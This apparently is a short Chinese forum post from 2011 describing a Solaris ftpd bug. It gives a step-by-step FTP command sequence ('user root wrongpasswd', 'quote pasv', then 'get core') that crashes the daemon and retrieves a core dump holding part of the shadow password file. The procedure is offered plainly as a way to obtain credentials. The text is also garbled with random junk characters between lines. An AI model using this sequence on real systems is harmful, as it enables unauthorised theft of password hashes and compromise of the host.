該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG����,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:- K& V, V+ c; E8 ^
& |$ M3 `3 _1 _ R3 c) j3 Z1.通過 ftp 正常登錄到目的主機(jī)上% S+ j. E3 E( b$ S1 o
5 s+ F& i) |. |5 U. H2.輸入如下命令序列:
9 [% x) E1 I$ K: U" C& W
8 A8 {+ w8 U$ k- L) E" Cftp> user root wrongpasswd4 g8 u( t$ _* F) k% ^
* W; G# [3 t8 q6 [ftp> quote pasv( Y# }4 w/ K* \
9 w w; Y h# Z$ j2 l; x2 E, V* b3.這時(shí)�,ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core��,口令文件就包含在這個(gè)core中���。
/ y6 f% V# M0 H9 O* _! |$ v
5 ?+ x5 L; h F7 |' E6 B4.再次進(jìn)入FTP >get core
, |% j; p3 r% G) R8 u( k% Q" f
/ \6 S/ C4 m0 a; d8 H* _, ?, S補(bǔ)充:雖然在core只有一部分shadow�����,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了
- C, C4 d) ~8 w, o7 s
6 q) T% M2 T) Q8 I( V |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡